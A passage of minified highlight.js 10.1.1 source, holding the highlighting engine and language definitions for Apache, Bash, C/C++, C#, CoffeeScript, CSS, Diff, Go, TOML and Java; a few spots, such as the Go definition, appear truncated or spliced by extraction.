l=t.exec(o);if(null==l){a+=o;break}a+=o.substring(0,l.index),o=o.substring(l.index+l[0].length),"\\"===l[0][0]&&l[1]?a+="\\"+(+l[1]+s):(a+=l[0],"("===l[0]&&r++)}a+=")"}return 
a}(e),!0),this.lastIndex=0}exec(e){this.matcherRe.lastIndex=this.lastIndex;const n=this.matcherRe.exec(e);if(!n)return null;const t=n.findIndex((e,n)=>n>0&&void 0!==e),r=this.matchIndexes[t];return n.splice(0,t),Object.assign(n,r)}}class a{constructor(){this.rules=[],this.multiRegexes=[],this.count=0,this.lastIndex=0,this.regexIndex=0}getMatcher(e){if(this.multiRegexes[e])return this.multiRegexes[e];const n=new t;return this.rules.slice(e).forEach(([e,t])=>n.addRule(e,t)),n.compile(),this.multiRegexes[e]=n,n}considerAll(){this.regexIndex=0}addRule(e,n){this.rules.push([e,n]),"begin"===n.type&&this.count++}exec(e){const n=this.getMatcher(this.regexIndex);n.lastIndex=this.lastIndex;const t=n.exec(e);return t&&(this.regexIndex+=t.position+1,this.regexIndex===this.count&&(this.regexIndex=0)),t}}function i(e,n){const t=e.input[e.index-1],r=e.input[e.index+e[0].length];"."!==t&&"."!==r||n.ignoreMatch()}if(e.contains&&e.contains.includes("self"))throw Error("ERR: contains `self` is not supported at the top-level of a language. See documentation.");return function t(s,o){const l=s;if(s.compiled)return l;s.compiled=!0,s.__beforeBegin=null,s.keywords=s.keywords||s.beginKeywords;let c=null;if("object"==typeof s.keywords&&(c=s.keywords.$pattern,delete s.keywords.$pattern),s.keywords&&(s.keywords=function(e,n){var t={};return"string"==typeof e?r("keyword",e):Object.keys(e).forEach((function(n){r(n,e[n])})),t;function r(e,r){n&&(r=r.toLowerCase()),r.split(" ").forEach((function(n){var r=n.split("|");t[r[0]]=[e,w(r[0],r[1])]}))}}(s.keywords,e.case_insensitive)),s.lexemes&&c)throw Error("ERR: Prefer `keywords.$pattern` to `mode.lexemes`, BOTH are not allowed. 
(see mode reference) ");return l.keywordPatternRe=n(s.lexemes||c||/\w+/,!0),o&&(s.beginKeywords&&(s.begin="\\b("+s.beginKeywords.split(" ").join("|")+")(?=\\b|\\s)",s.__beforeBegin=i),s.begin||(s.begin=/\B|\b/),l.beginRe=n(s.begin),s.endSameAsBegin&&(s.end=s.begin),s.end||s.endsWithParent||(s.end=/\B|\b/),s.end&&(l.endRe=n(s.end)),l.terminator_end=d(s.end)||"",s.endsWithParent&&o.terminator_end&&(l.terminator_end+=(s.end?"|":"")+o.terminator_end)),s.illegal&&(l.illegalRe=n(s.illegal)),void 0===s.relevance&&(s.relevance=1),s.contains||(s.contains=[]),s.contains=[].concat(...s.contains.map((function(e){return function(e){return e.variants&&!e.cached_variants&&(e.cached_variants=e.variants.map((function(n){return r(e,{variants:null},n)}))),e.cached_variants?e.cached_variants:function e(n){return!!n&&(n.endsWithParent||e(n.starts))}(e)?r(e,{starts:e.starts?r(e.starts):null}):Object.isFrozen(e)?r(e):e}("self"===e?s:e)}))),s.contains.forEach((function(e){t(e,l)})),s.starts&&t(s.starts,o),l.matcher=function(e){const n=new a;return e.contains.forEach(e=>n.addRule(e.begin,{rule:e,type:"begin"})),e.terminator_end&&n.addRule(e.terminator_end,{type:"end"}),e.illegal&&n.addRule(e.illegal,{type:"illegal"}),n}(l),l}(e)}(E),N="",y=s||_,k={},O=new f.__emitter(f);!function(){for(var e=[],n=y;n!==E;n=n.parent)n.className&&e.unshift(n.className);e.forEach(e=>O.openNode(e))}();var A="",I=0,S=0,B=0,L=!1;try{for(y.matcher.considerAll();;){B++,L?L=!1:(y.matcher.lastIndex=S,y.matcher.considerAll());const e=y.matcher.exec(o);if(!e)break;const n=x(o.substring(S,e.index),e);S=e.index+n}return x(o.substr(S)),O.closeAllNodes(),O.finalize(),N=O.toHTML(),{relevance:I,value:N,language:e,illegal:!1,emitter:O,top:y}}catch(n){if(n.message&&n.message.includes("Illegal"))return{illegal:!0,illegalBy:{msg:n.message,context:o.slice(S-100,S+100),mode:n.mode},sofar:N,relevance:0,value:R(o),emitter:O};if(l)return{illegal:!1,relevance:0,value:R(o),emitter:O,language:e,top:y,errorRaised:n};throw n}}function 
v(e,n){n=n||f.languages||Object.keys(i);var t=function(e){const n={relevance:0,emitter:new f.__emitter(f),value:R(e),illegal:!1,top:h};return n.emitter.addText(e),n}(e),r=t;return n.filter(T).filter(I).forEach((function(n){var a=m(n,e,!1);a.language=n,a.relevance>r.relevance&&(r=a),a.relevance>t.relevance&&(r=t,t=a)})),r.language&&(t.second_best=r),t}function x(e){return f.tabReplace||f.useBR?e.replace(c,e=>"\n"===e?f.useBR?"
":e:f.tabReplace?e.replace(/\t/g,f.tabReplace):e):e}function E(e){let n=null;const t=function(e){var n=e.className+" ";n+=e.parentNode?e.parentNode.className:"";const t=f.languageDetectRe.exec(n);if(t){var r=T(t[1]);return r||(console.warn(g.replace("{}",t[1])),console.warn("Falling back to no-highlight mode for this block.",e)),r?t[1]:"no-highlight"}return n.split(/\s+/).find(e=>p(e)||T(e))}(e);if(p(t))return;S("before:highlightBlock",{block:e,language:t}),f.useBR?(n=document.createElement("div")).innerHTML=e.innerHTML.replace(/\n/g,"").replace(//g,"\n"):n=e;const r=n.textContent,a=t?b(t,r,!0):v(r),i=k(n);if(i.length){const e=document.createElement("div");e.innerHTML=a.value,a.value=O(i,k(e),r)}a.value=x(a.value),S("after:highlightBlock",{block:e,result:a}),e.innerHTML=a.value,e.className=function(e,n,t){var r=n?s[n]:t,a=[e.trim()];return e.match(/\bhljs\b/)||a.push("hljs"),e.includes(r)||a.push(r),a.join(" ").trim()}(e.className,t,a.language),e.result={language:a.language,re:a.relevance,relavance:a.relevance},a.second_best&&(e.second_best={language:a.second_best.language,re:a.second_best.relevance,relavance:a.second_best.relevance})}const N=()=>{if(!N.called){N.called=!0;var e=document.querySelectorAll("pre code");a.forEach.call(e,E)}};function T(e){return e=(e||"").toLowerCase(),i[e]||i[s[e]]}function A(e,{languageName:n}){"string"==typeof e&&(e=[e]),e.forEach(e=>{s[e]=n})}function I(e){var n=T(e);return n&&!n.disableAutodetect}function S(e,n){var t=e;o.forEach((function(e){e[t]&&e[t](n)}))}Object.assign(t,{highlight:b,highlightAuto:v,fixMarkup:x,highlightBlock:E,configure:function(e){f=y(f,e)},initHighlighting:N,initHighlightingOnLoad:function(){window.addEventListener("DOMContentLoaded",N,!1)},registerLanguage:function(e,n){var r=null;try{r=n(t)}catch(n){if(console.error("Language definition for '{}' could not be registered.".replace("{}",e)),!l)throw 
n;console.error(n),r=h}r.name||(r.name=e),i[e]=r,r.rawDefinition=n.bind(null,t),r.aliases&&A(r.aliases,{languageName:e})},listLanguages:function(){return Object.keys(i)},getLanguage:T,registerAliases:A,requireLanguage:function(e){var n=T(e);if(n)return n;throw Error("The '{}' language is required, but not loaded.".replace("{}",e))},autoDetection:I,inherit:y,addPlugin:function(e){o.push(e)}}),t.debugMode=function(){l=!1},t.safeMode=function(){l=!0},t.versionString="10.1.1";for(const n in _)"object"==typeof _[n]&&e(_[n]);return Object.assign(t,_),t}({})}();"object"==typeof exports&&"undefined"!=typeof module&&(module.exports=hljs); +hljs.registerLanguage("apache",function(){"use strict";return function(e){var n={className:"number",begin:"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}(:\\d{1,5})?"};return{name:"Apache config",aliases:["apacheconf"],case_insensitive:!0,contains:[e.HASH_COMMENT_MODE,{className:"section",begin:"",contains:[n,{className:"number",begin:":\\d{1,5}"},e.inherit(e.QUOTE_STRING_MODE,{relevance:0})]},{className:"attribute",begin:/\w+/,relevance:0,keywords:{nomarkup:"order deny allow setenv rewriterule rewriteengine rewritecond documentroot sethandler errordocument loadmodule options header listen serverroot servername"},starts:{end:/$/,relevance:0,keywords:{literal:"on off all deny allow"},contains:[{className:"meta",begin:"\\s\\[",end:"\\]$"},{className:"variable",begin:"[\\$%]\\{",end:"\\}",contains:["self",{className:"number",begin:"[\\$%]\\d+"}]},n,{className:"number",begin:"\\d+"},e.QUOTE_STRING_MODE]}}],illegal:/\S/}}}()); +hljs.registerLanguage("bash",function(){"use strict";return function(e){const s={};Object.assign(s,{className:"variable",variants:[{begin:/\$[\w\d#@][\w\d_]*/},{begin:/\$\{/,end:/\}/,contains:[{begin:/:-/,contains:[s]}]}]});const t={className:"subst",begin:/\$\(/,end:/\)/,contains:[e.BACKSLASH_ESCAPE]},n={className:"string",begin:/"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,s,t]};t.contains.push(n);const 
a={begin:/\$\(\(/,end:/\)\)/,contains:[{begin:/\d+#[0-9a-f]+/,className:"number"},e.NUMBER_MODE,s]},i=e.SHEBANG({binary:"(fish|bash|zsh|sh|csh|ksh|tcsh|dash|scsh)",relevance:10}),c={className:"function",begin:/\w[\w\d_]*\s*\(\s*\)\s*\{/,returnBegin:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/\w[\w\d_]*/})],relevance:0};return{name:"Bash",aliases:["sh","zsh"],keywords:{$pattern:/\b-?[a-z\._]+\b/,keyword:"if then else elif fi for while in do done case esac function",literal:"true false",built_in:"break cd continue eval exec exit export getopts hash pwd readonly return shift test times trap umask unset alias bind builtin caller command declare echo enable help let local logout mapfile printf read readarray source type typeset ulimit unalias set shopt autoload bg bindkey bye cap chdir clone comparguments compcall compctl compdescribe compfiles compgroups compquote comptags comptry compvalues dirs disable disown echotc echoti emulate fc fg float functions getcap getln history integer jobs kill limit log noglob popd print pushd pushln rehash sched setcap setopt stat suspend ttyctl unfunction unhash unlimit unsetopt vared wait whence where which zcompile zformat zftp zle zmodload zparseopts zprof zpty zregexparse zsocket zstyle ztcp",_:"-ne -eq -lt -gt -f -d -e -s -l -a"},contains:[i,e.SHEBANG(),c,a,e.HASH_COMMENT_MODE,n,{className:"",begin:/\\"/},{className:"string",begin:/'/,end:/'/},s]}}}()); +hljs.registerLanguage("c-like",function(){"use strict";return function(e){function t(e){return"(?:"+e+")?"}var n="(decltype\\(auto\\)|"+t("[a-zA-Z_]\\w*::")+"[a-zA-Z_]\\w*"+t("<.*?>")+")",r={className:"keyword",begin:"\\b[a-z\\d_]*_t\\b"},a={className:"string",variants:[{begin:'(u8?|U|L)?"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:"(u8?|U|L)?'(\\\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4,8}|[0-7]{3}|\\S)|.)",end:"'",illegal:"."},e.END_SAME_AS_BEGIN({begin:/(?:u8?|U|L)?R"([^()\\ ]{0,16})\(/,end:/\)([^()\\ 
]{0,16})"/})]},i={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)(u|U|l|L|ul|UL|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"}],relevance:0},s={className:"meta",begin:/#\s*[a-z]+\b/,end:/$/,keywords:{"meta-keyword":"if else elif endif define undef warning error line pragma _Pragma ifdef ifndef include"},contains:[{begin:/\\\n/,relevance:0},e.inherit(a,{className:"meta-string"}),{className:"meta-string",begin:/<.*?>/,end:/$/,illegal:"\\n"},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},o={className:"title",begin:t("[a-zA-Z_]\\w*::")+e.IDENT_RE,relevance:0},c=t("[a-zA-Z_]\\w*::")+e.IDENT_RE+"\\s*\\(",l={keyword:"int float while private char char8_t char16_t char32_t catch import module export virtual operator sizeof dynamic_cast|10 typedef const_cast|10 const for static_cast|10 union namespace unsigned long volatile static protected bool template mutable if public friend do goto auto void enum else break extern using asm case typeid wchar_t short reinterpret_cast|10 default double register explicit signed typename try this switch continue inline delete alignas alignof constexpr consteval constinit decltype concept co_await co_return co_yield requires noexcept static_assert thread_local restrict final override atomic_bool atomic_char atomic_schar atomic_uchar atomic_short atomic_ushort atomic_int atomic_uint atomic_long atomic_ulong atomic_llong atomic_ullong new throw return and and_eq bitand bitor compl not not_eq or or_eq xor xor_eq",built_in:"std string wstring cin cout cerr clog stdin stdout stderr stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set pair bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap priority_queue make_pair array shared_ptr abort terminate abs acos asin atan2 atan calloc ceil cosh cos exit exp fabs floor fmod fprintf fputs free frexp fscanf future isalnum 
isalpha iscntrl isdigit isgraph islower isprint ispunct isspace isupper isxdigit tolower toupper labs ldexp log10 log malloc realloc memchr memcmp memcpy memset modf pow printf putchar puts scanf sinh sin snprintf sprintf sqrt sscanf strcat strchr strcmp strcpy strcspn strlen strncat strncmp strncpy strpbrk strrchr strspn strstr tanh tan vfprintf vprintf vsprintf endl initializer_list unique_ptr _Bool complex _Complex imaginary _Imaginary",literal:"true false nullptr NULL"},d=[r,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,i,a],_={variants:[{begin:/=/,end:/;/},{begin:/\(/,end:/\)/},{beginKeywords:"new throw return else",end:/;/}],keywords:l,contains:d.concat([{begin:/\(/,end:/\)/,keywords:l,contains:d.concat(["self"]),relevance:0}]),relevance:0},u={className:"function",begin:"("+n+"[\\*&\\s]+)+"+c,returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:l,illegal:/[^\w\s\*&:<>]/,contains:[{begin:"decltype\\(auto\\)",keywords:l,relevance:0},{begin:c,returnBegin:!0,contains:[o],relevance:0},{className:"params",begin:/\(/,end:/\)/,keywords:l,relevance:0,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,i,r,{begin:/\(/,end:/\)/,keywords:l,relevance:0,contains:["self",e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,i,r]}]},r,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,s]};return{aliases:["c","cc","h","c++","h++","hpp","hh","hxx","cxx"],keywords:l,disableAutodetect:!0,illegal:"",keywords:l,contains:["self",r]},{begin:e.IDENT_RE+"::",keywords:l},{className:"class",beginKeywords:"class struct",end:/[{;:]/,contains:[{begin://,contains:["self"]},e.TITLE_MODE]}]),exports:{preprocessor:s,strings:a,keywords:l}}}}()); +hljs.registerLanguage("c",function(){"use strict";return function(e){var n=e.getLanguage("c-like").rawDefinition();return n.name="C",n.aliases=["c","h"],n}}()); +hljs.registerLanguage("coffeescript",function(){"use strict";const 
e=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends"],n=["true","false","null","undefined","NaN","Infinity"],a=[].concat(["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape"],["arguments","this","super","console","window","document","localStorage","module","global"],["Intl","DataView","Number","Math","Date","String","RegExp","Object","Function","Boolean","Error","Symbol","Set","Map","WeakSet","WeakMap","Proxy","Reflect","JSON","Promise","Float64Array","Int16Array","Int32Array","Int8Array","Uint16Array","Uint32Array","Float32Array","Array","Uint8Array","Uint8ClampedArray","ArrayBuffer"],["EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError"]);return function(r){var t={keyword:e.concat(["then","unless","until","loop","by","when","and","or","is","isnt","not"]).filter((e=>n=>!e.includes(n))(["var","const","let","function","static"])).join(" "),literal:n.concat(["yes","no","on","off"]).join(" "),built_in:a.concat(["npm","print"]).join(" ")},i="[A-Za-z$_][0-9A-Za-z$_]*",s={className:"subst",begin:/#\{/,end:/}/,keywords:t},o=[r.BINARY_NUMBER_MODE,r.inherit(r.C_NUMBER_MODE,{starts:{end:"(\\s*/)?",relevance:0}}),{className:"string",variants:[{begin:/'''/,end:/'''/,contains:[r.BACKSLASH_ESCAPE]},{begin:/'/,end:/'/,contains:[r.BACKSLASH_ESCAPE]},{begin:/"""/,end:/"""/,contains:[r.BACKSLASH_ESCAPE,s]},{begin:/"/,end:/"/,contains:[r.BACKSLASH_ESCAPE,s]}]},{className:"regexp",variants:[{begin:"///",end:"///",contains:[s,r.HASH_COMMENT_MODE]},{begin:"//[gim]{0,3}(?=\\W)",relevance:0},{begin:/\/(?![ 
*]).*?(?![\\]).\/[gim]{0,3}(?=\W)/}]},{begin:"@"+i},{subLanguage:"javascript",excludeBegin:!0,excludeEnd:!0,variants:[{begin:"```",end:"```"},{begin:"`",end:"`"}]}];s.contains=o;var c=r.inherit(r.TITLE_MODE,{begin:i}),l={className:"params",begin:"\\([^\\(]",returnBegin:!0,contains:[{begin:/\(/,end:/\)/,keywords:t,contains:["self"].concat(o)}]};return{name:"CoffeeScript",aliases:["coffee","cson","iced"],keywords:t,illegal:/\/\*/,contains:o.concat([r.COMMENT("###","###"),r.HASH_COMMENT_MODE,{className:"function",begin:"^\\s*"+i+"\\s*=\\s*(\\(.*\\))?\\s*\\B[-=]>",end:"[-=]>",returnBegin:!0,contains:[c,l]},{begin:/[:\(,=]\s*/,relevance:0,contains:[{className:"function",begin:"(\\(.*\\))?\\s*\\B[-=]>",end:"[-=]>",returnBegin:!0,contains:[l]}]},{className:"class",beginKeywords:"class",end:"$",illegal:/[:="\[\]]/,contains:[{beginKeywords:"extends",endsWithParent:!0,illegal:/[:="\[\]]/,contains:[c]},c]},{begin:i+":",end:":",returnBegin:!0,returnEnd:!0,relevance:0}])}}}()); +hljs.registerLanguage("cpp",function(){"use strict";return function(e){var t=e.getLanguage("c-like").rawDefinition();return t.disableAutodetect=!1,t.name="C++",t.aliases=["cc","c++","h++","hpp","hh","hxx","cxx"],t}}()); +hljs.registerLanguage("csharp",function(){"use strict";return function(e){var n={keyword:"abstract as base bool break byte case catch char checked const continue decimal default delegate do double enum event explicit extern finally fixed float for foreach goto if implicit in int interface internal is lock long object operator out override params private protected public readonly ref sbyte sealed short sizeof stackalloc static string struct switch this try typeof uint ulong unchecked unsafe ushort using virtual void volatile while add alias ascending async await by descending dynamic equals from get global group into join let nameof on orderby partial remove select set value var when where yield",literal:"null false 
true"},i=e.inherit(e.TITLE_MODE,{begin:"[a-zA-Z](\\.?\\w)*"}),a={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)(u|U|l|L|ul|UL|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"}],relevance:0},s={className:"string",begin:'@"',end:'"',contains:[{begin:'""'}]},t=e.inherit(s,{illegal:/\n/}),l={className:"subst",begin:"{",end:"}",keywords:n},r=e.inherit(l,{illegal:/\n/}),c={className:"string",begin:/\$"/,end:'"',illegal:/\n/,contains:[{begin:"{{"},{begin:"}}"},e.BACKSLASH_ESCAPE,r]},o={className:"string",begin:/\$@"/,end:'"',contains:[{begin:"{{"},{begin:"}}"},{begin:'""'},l]},g=e.inherit(o,{illegal:/\n/,contains:[{begin:"{{"},{begin:"}}"},{begin:'""'},r]});l.contains=[o,c,s,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.C_BLOCK_COMMENT_MODE],r.contains=[g,c,t,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.inherit(e.C_BLOCK_COMMENT_MODE,{illegal:/\n/})];var d={variants:[o,c,s,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},E={begin:"<",end:">",contains:[{beginKeywords:"in out"},i]},_=e.IDENT_RE+"(<"+e.IDENT_RE+"(\\s*,\\s*"+e.IDENT_RE+")*>)?(\\[\\])?",b={begin:"@"+e.IDENT_RE,relevance:0};return{name:"C#",aliases:["cs","c#"],keywords:n,illegal:/::/,contains:[e.COMMENT("///","$",{returnBegin:!0,contains:[{className:"doctag",variants:[{begin:"///",relevance:0},{begin:"\x3c!--|--\x3e"},{begin:""}]}]}),e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"meta",begin:"#",end:"$",keywords:{"meta-keyword":"if else elif endif define undef warning error line region endregion pragma checksum"}},d,a,{beginKeywords:"class interface",end:/[{;=]/,illegal:/[^\s:,]/,contains:[{beginKeywords:"where 
class"},i,E,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{beginKeywords:"namespace",end:/[{;=]/,illegal:/[^\s:]/,contains:[i,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{className:"meta",begin:"^\\s*\\[",excludeBegin:!0,end:"\\]",excludeEnd:!0,contains:[{className:"meta-string",begin:/"/,end:/"/}]},{beginKeywords:"new return throw await else",relevance:0},{className:"function",begin:"("+_+"\\s+)+"+e.IDENT_RE+"\\s*(\\<.+\\>)?\\s*\\(",returnBegin:!0,end:/\s*[{;=]/,excludeEnd:!0,keywords:n,contains:[{begin:e.IDENT_RE+"\\s*(\\<.+\\>)?\\s*\\(",returnBegin:!0,contains:[e.TITLE_MODE,E],relevance:0},{className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:n,relevance:0,contains:[d,a,e.C_BLOCK_COMMENT_MODE]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},b]}}}()); +hljs.registerLanguage("css",function(){"use strict";return function(e){var n={begin:/(?:[A-Z\_\.\-]+|--[a-zA-Z0-9_-]+)\s*:/,returnBegin:!0,end:";",endsWithParent:!0,contains:[{className:"attribute",begin:/\S/,end:":",excludeEnd:!0,starts:{endsWithParent:!0,excludeEnd:!0,contains:[{begin:/[\w-]+\(/,returnBegin:!0,contains:[{className:"built_in",begin:/[\w-]+/},{begin:/\(/,end:/\)/,contains:[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,e.CSS_NUMBER_MODE]}]},e.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,e.C_BLOCK_COMMENT_MODE,{className:"number",begin:"#[0-9A-Fa-f]+"},{className:"meta",begin:"!important"}]}}]};return{name:"CSS",case_insensitive:!0,illegal:/[=\/|'\$]/,contains:[e.C_BLOCK_COMMENT_MODE,{className:"selector-id",begin:/#[A-Za-z0-9_-]+/},{className:"selector-class",begin:/\.[A-Za-z0-9_-]+/},{className:"selector-attr",begin:/\[/,end:/\]/,illegal:"$",contains:[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},{className:"selector-pseudo",begin:/:(:)?[a-zA-Z0-9\_\-\+\(\)"'.]+/},{begin:"@(page|font-face)",lexemes:"@[a-z-]+",keywords:"@page 
@font-face"},{begin:"@",end:"[{;]",illegal:/:/,returnBegin:!0,contains:[{className:"keyword",begin:/@\-?\w[\w]*(\-\w+)*/},{begin:/\s/,endsWithParent:!0,excludeEnd:!0,relevance:0,keywords:"and or not only",contains:[{begin:/[a-z-]+:/,className:"attribute"},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,e.CSS_NUMBER_MODE]}]},{className:"selector-tag",begin:"[a-zA-Z-][a-zA-Z0-9_-]*",relevance:0},{begin:"{",end:"}",illegal:/\S/,contains:[e.C_BLOCK_COMMENT_MODE,n]}]}}}()); +hljs.registerLanguage("diff",function(){"use strict";return function(e){return{name:"Diff",aliases:["patch"],contains:[{className:"meta",relevance:10,variants:[{begin:/^@@ +\-\d+,\d+ +\+\d+,\d+ +@@$/},{begin:/^\*\*\* +\d+,\d+ +\*\*\*\*$/},{begin:/^\-\-\- +\d+,\d+ +\-\-\-\-$/}]},{className:"comment",variants:[{begin:/Index: /,end:/$/},{begin:/={3,}/,end:/$/},{begin:/^\-{3}/,end:/$/},{begin:/^\*{3} /,end:/$/},{begin:/^\+{3}/,end:/$/},{begin:/^\*{15}$/}]},{className:"addition",begin:"^\\+",end:"$"},{className:"deletion",begin:"^\\-",end:"$"},{className:"addition",begin:"^\\!",end:"$"}]}}}()); +hljs.registerLanguage("go",function(){"use strict";return function(e){var n={keyword:"break default func interface select case map struct chan else goto package switch const fallthrough if range type continue for import return var go defer bool byte complex64 complex128 float32 float64 int8 int16 int32 int64 string uint8 uint16 uint32 uint64 int uint uintptr rune",literal:"true false iota nil",built_in:"append cap close complex copy imag len make new panic print println real recover delete"};return{name:"Go",aliases:["golang"],keywords:n,illegal:"e(n)).join("")}return function(a){var s={className:"number",relevance:0,variants:[{begin:/([\+\-]+)?[\d]+_[\d_]+/},{begin:a.NUMBER_RE}]},i=a.COMMENT();i.variants=[{begin:/;/,end:/$/},{begin:/#/,end:/$/}];var 
t={className:"variable",variants:[{begin:/\$[\w\d"][\w\d_]*/},{begin:/\$\{(.*?)}/}]},r={className:"literal",begin:/\bon|off|true|false|yes|no\b/},l={className:"string",contains:[a.BACKSLASH_ESCAPE],variants:[{begin:"'''",end:"'''",relevance:10},{begin:'"""',end:'"""',relevance:10},{begin:'"',end:'"'},{begin:"'",end:"'"}]},c={begin:/\[/,end:/\]/,contains:[i,r,t,l,s,"self"],relevance:0},g="("+[/[A-Za-z0-9_-]+/,/"(\\"|[^"])*"/,/'[^']*'/].map(n=>e(n)).join("|")+")";return{name:"TOML, also INI",aliases:["toml"],case_insensitive:!0,illegal:/\S/,contains:[i,{className:"section",begin:/\[+/,end:/\]+/},{begin:n(g,"(\\s*\\.\\s*",g,")*",n("(?=",/\s*=\s*[^#\s]/,")")),className:"attr",starts:{end:/$/,contains:[i,c,r,t,l,s]}}]}}}()); +hljs.registerLanguage("java",function(){"use strict";function e(e){return e?"string"==typeof e?e:e.source:null}function n(e){return a("(",e,")?")}function a(...n){return n.map(n=>e(n)).join("")}function s(...n){return"("+n.map(n=>e(n)).join("|")+")"}return function(e){var t="false synchronized int abstract float private char boolean var static null if const for true while long strictfp finally protected import native final void enum else break transient catch instanceof byte super volatile case assert short package default double public try this switch continue throws protected public private module requires exports 
do",i={className:"meta",begin:"@[À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*",contains:[{begin:/\(/,end:/\)/,contains:["self"]}]},r=e=>a("[",e,"]+([",e,"_]*[",e,"]+)?"),c={className:"number",variants:[{begin:`\\b(0[bB]${r("01")})[lL]?`},{begin:`\\b(0${r("0-7")})[dDfFlL]?`},{begin:a(/\b0[xX]/,s(a(r("a-fA-F0-9"),/\./,r("a-fA-F0-9")),a(r("a-fA-F0-9"),/\.?/),a(/\./,r("a-fA-F0-9"))),/([pP][+-]?(\d+))?/,/[fFdDlL]?/)},{begin:a(/\b/,s(a(/\d*\./,r("\\d")),r("\\d")),/[eE][+-]?[\d]+[dDfF]?/)},{begin:a(/\b/,r(/\d/),n(/\.?/),n(r(/\d/)),/[dDfFlL]?/)}],relevance:0};return{name:"Java",aliases:["jsp"],keywords:t,illegal:/<\/|#/,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{begin:/\w+@/,relevance:0},{className:"doctag",begin:"@[A-Za-z]+"}]}),e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{className:"class",beginKeywords:"class interface",end:/[{;=]/,excludeEnd:!0,keywords:"class interface",illegal:/[:"\[\]]/,contains:[{beginKeywords:"extends implements"},e.UNDERSCORE_TITLE_MODE]},{beginKeywords:"new throw return else",relevance:0},{className:"function",begin:"([À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*(<[À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*(\\s*,\\s*[À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*)*>)?\\s+)+"+e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:t,contains:[{begin:e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,relevance:0,contains:[e.UNDERSCORE_TITLE_MODE]},{className:"params",begin:/\(/,end:/\)/,keywords:t,relevance:0,contains:[i,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,e.C_NUMBER_MODE,e.C_BLOCK_COMMENT_MODE]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},c,i]}}}()); +hljs.registerLanguage("javascript",function(){"use strict";const 
e=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends"],n=["true","false","null","undefined","NaN","Infinity"],a=[].concat(["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape"],["arguments","this","super","console","window","document","localStorage","module","global"],["Intl","DataView","Number","Math","Date","String","RegExp","Object","Function","Boolean","Error","Symbol","Set","Map","WeakSet","WeakMap","Proxy","Reflect","JSON","Promise","Float64Array","Int16Array","Int32Array","Int8Array","Uint16Array","Uint32Array","Float32Array","Array","Uint8Array","Uint8ClampedArray","ArrayBuffer"],["EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError"]);function s(e){return r("(?=",e,")")}function r(...e){return e.map(e=>(function(e){return e?"string"==typeof e?e:e.source:null})(e)).join("")}return function(t){var i="[A-Za-z$_][0-9A-Za-z$_]*",c={begin:/<[A-Za-z0-9\\._:-]+/,end:/\/[A-Za-z0-9\\._:-]+>|\/>/},o={$pattern:"[A-Za-z$_][0-9A-Za-z$_]*",keyword:e.join(" "),literal:n.join(" "),built_in:a.join(" 
